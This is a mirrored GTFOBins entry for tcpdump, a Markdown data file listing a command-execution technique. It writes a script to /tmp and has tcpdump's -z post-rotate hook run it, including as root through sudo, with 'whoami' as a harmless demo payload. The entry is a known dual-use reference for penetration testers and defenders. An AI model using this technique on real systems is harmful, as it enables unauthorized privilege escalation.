mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
10 lines
329 B
Markdown
10 lines
329 B
Markdown
---
|
|
functions:
|
|
execute-non-interactive:
|
|
- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
|
|
tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
|
|
sudo-enabled:
|
|
- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
|
|
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
|
|
---
|